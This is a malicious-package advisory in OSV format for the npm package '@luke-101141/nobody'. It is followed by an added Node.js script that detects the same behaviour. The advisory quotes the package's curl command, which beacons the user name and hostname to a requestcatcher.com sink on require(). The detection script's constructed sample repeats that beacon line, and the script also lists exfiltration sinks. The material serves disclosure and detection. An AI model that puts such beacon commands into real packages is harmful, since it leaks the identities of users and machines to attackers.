{"id":"MAL-2026-4229","summary":"Malicious code in @luke-101141/nobody (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (8a22de475581dbf26085c2605781782a61205eb62add0a261eabe2357ac2cbc8)\nOn require(), index.js executes `curl -X POST \"http://frgthyujiouyh.requestcatcher.com/noderedactedsdk/$(whoami)/$(hostname)/\"`, leaking the installing user's identity and machine hostname over plaintext HTTP to an anonymous request-inspection service (requestcatcher.com) commonly used as a throwaway exfil sink. The package has no advertised functionality — empty description, no useful exports — its sole effect is the identity beacon. package.json also contains a top-level `\"preinstall\": \"node index.js\"` field outside the `scripts` block; as written it does not fire at install time, but the intent to trigger the same payload at `npm install` is explicit. Any consumer importing this package leaks host/user identity to the attacker.\n\n## Source: ossf-package-analysis (cd4cb72508248900987f8bd099896c95e232fee57835b5a89ac6b0d3178c2ed7)\nThe OpenSSF Package Analysis project identified '@luke-101141/nobody' @ 1.0.1 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package executes one or more commands associated with malicious behavior.\n","modified":"2026-05-27T23:16:43.048173591Z","published":"2026-05-21T13:18:52Z","database_specific":{"malicious-packages-origins":[{"sha256":"cd4cb72508248900987f8bd099896c95e232fee57835b5a89ac6b0d3178c2ed7","source":"ossf-package-analysis","import_time":"2026-05-21T22:53:48.245127954Z","versions":["1.0.1"],"modified_time":"2026-05-21T13:31:26Z"},{"sha256":"8a22de475581dbf26085c2605781782a61205eb62add0a261eabe2357ac2cbc8","versions":["1.0.1"],"id":"IN-MAL-2026-003819","import_time":"2026-05-26T05:51:22.838518518Z","source":"amazon-inspector","modified_time":"2026-05-21T13:18:52Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@luke-101141/nobody/v/1.0.1"}],"affected":[{"package":{"name":"@luke-101141/nobody","ecosystem":"npm","purl":"pkg:npm/%40luke-101141%2Fnobody"},"versions":["1.0.1"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@luke-101141/nobody/MAL-2026-4229.json","cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"package_integrity":[{"hashes":{"sha1":"5a0cbf29659f7fece79c521746a19f0faa7c4376","sha512_sri":"sha512-D27Eh35JzuckGv3gBLQqbpXixCDeRLfohET6SPUqcm4i7zVYwPhArUa07lKgDihfnaBEOAfmz3CzgPPFLthWsg=="},"filename":"nobody-1.0.1.tgz"}],"evidence_files":[{"sha256":"49be609680fa7f470d893f23ea379e7336ae84fc14521dd9f14df859646ce1c3","tlsh":"0be07d0e1cf88d3a723354a5f948581ba68bdb101237f0d2a89e1509038998448182cb","path":"index.js"},{"sha256":"5289d5e4b19c6d1ec270927d4147db913fe9dc77c05fd09b25bfbf9356ad7be2","tlsh":"09d05e380d61953326c40a66096ba45766a18f2f00287c0897db583890debb7a8ff36d","path":"package.json"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"},{"name":"OpenSSF: Package Analysis","contact":["https://github.com/ossf/package-analysis","https://openssf.slack.com/channels/package_analysis"],"type":"FINDER"}]}
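Added example, not part of the advisory record and not the package's code: a static triage pass in Node.js that flags the two behaviours the Amazon Inspector source describes. It looks for a shell-out that beacons `$(whoami)` and `$(hostname)` to a throwaway request-inspection sink over plaintext HTTP, and for a lifecycle hook placed at the top level of package.json instead of under `scripts`, which npm never runs but which records intent. The sample package.json and index.js below are constructed to mirror the description, not copied from the package; the placeholder package names, the benign control package, and every sink in the list other than requestcatcher.com are assumptions.

```javascript
// Added example (not the advisory's or the package's code): static triage of an
// npm package's package.json and entry file for an install- or require-time beacon.

// npm only honours these keys when they sit under "scripts"; the same key at the
// top level of package.json is ignored by npm but is a strong signal of intent.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// requestcatcher.com is the sink named in the advisory. The other entries are an
// assumption: anonymous request-inspection services a triage rule typically covers.
const THROWAWAY_SINKS = ["requestcatcher.com", "webhook.site", "interact.sh"];

// Tokens that leak the installing user's identity or the host's name.
const FINGERPRINT_TOKENS = ["$(whoami)", "$(hostname)", "os.userInfo()", "os.hostname()"];

function triagePackageJson(pkgJsonText) {
  const findings = [];
  const pkg = JSON.parse(pkgJsonText);
  const scripts = pkg.scripts && typeof pkg.scripts === "object" ? pkg.scripts : {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (typeof scripts[hook] === "string") {
      findings.push({ kind: "lifecycle-hook", hook, cmd: scripts[hook], fires: true });
    }
    if (typeof pkg[hook] === "string") {
      // Misplaced hook: npm will not execute it, but the author wanted it to run.
      findings.push({ kind: "misplaced-hook", hook, cmd: pkg[hook], fires: false });
    }
  }
  if (!pkg.description) findings.push({ kind: "empty-description" });
  return findings;
}

function triageSource(srcText) {
  const findings = [];
  if (/\bchild_process\b/.test(srcText)) findings.push({ kind: "child-process" });
  // A URL ends at whitespace or a quote, so the curl argument is captured whole.
  for (const m of srcText.matchAll(/https?:\/\/[^\s"'`]+/g)) {
    let host;
    try { host = new URL(m[0]).hostname; } catch { continue; }
    const sink = THROWAWAY_SINKS.find((s) => host === s || host.endsWith("." + s));
    if (sink) {
      findings.push({ kind: "throwaway-sink", host, sink, plaintext: m[0].startsWith("http:") });
    }
  }
  const tokens = FINGERPRINT_TOKENS.filter((t) => srcText.includes(t));
  if (tokens.length) findings.push({ kind: "host-fingerprint", tokens });
  return findings;
}

// Any lifecycle hook (real or misplaced) or shell-out earns "review"; a request to a
// throwaway sink carrying host/user identity is the beacon pattern from the advisory.
function triagePackage(pkgJsonText, srcText) {
  const findings = [...triagePackageJson(pkgJsonText), ...triageSource(srcText)];
  const kinds = new Set(findings.map((f) => f.kind));
  let verdict = "clean";
  if (kinds.has("throwaway-sink") && kinds.has("host-fingerprint")) {
    verdict = "identity-beacon";
  } else if (["throwaway-sink", "lifecycle-hook", "misplaced-hook", "child-process"].some((k) => kinds.has(k))) {
    verdict = "review";
  }
  return { verdict, findings };
}

// Constructed sample mirroring the advisory's description (not the package's real files).
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: "@example/beacon-demo", // assumption: placeholder name
  version: "1.0.1",
  description: "",
  main: "index.js",
  preinstall: "node index.js", // top level, outside "scripts": npm will not run it
  scripts: {},
});
const SAMPLE_INDEX_JS = [
  'const { execSync } = require("child_process");',
  'execSync(`curl -X POST "http://example-sink.requestcatcher.com/demo/$(whoami)/$(hostname)/"`);',
].join("\n");

// Constructed benign control: a native addon with a genuine build hook and no exfil.
const BENIGN_PACKAGE_JSON = JSON.stringify({
  name: "@example/native-addon", version: "2.0.0", description: "bindings", main: "index.js",
  scripts: { install: "node-gyp rebuild" },
});
const BENIGN_INDEX_JS = 'module.exports = require("./build/Release/addon.node");';

console.log(JSON.stringify(triagePackage(SAMPLE_PACKAGE_JSON, SAMPLE_INDEX_JS), null, 2));
console.log("benign control:", triagePackage(BENIGN_PACKAGE_JSON, BENIGN_INDEX_JS).verdict);
```

The benign control still comes back as "review" because any install hook runs arbitrary code on the installing host; the distinguishing signal for this advisory is the sink plus fingerprint combination, not the hook alone. Note that `npm install --ignore-scripts` would neutralise a correctly placed preinstall hook but does nothing here, since the payload runs on require(); the effective controls are keeping the package out before install (registry allow-lists, lockfile review) and alerting on egress to *.requestcatcher.com and similar sinks from developer, build and CI hosts.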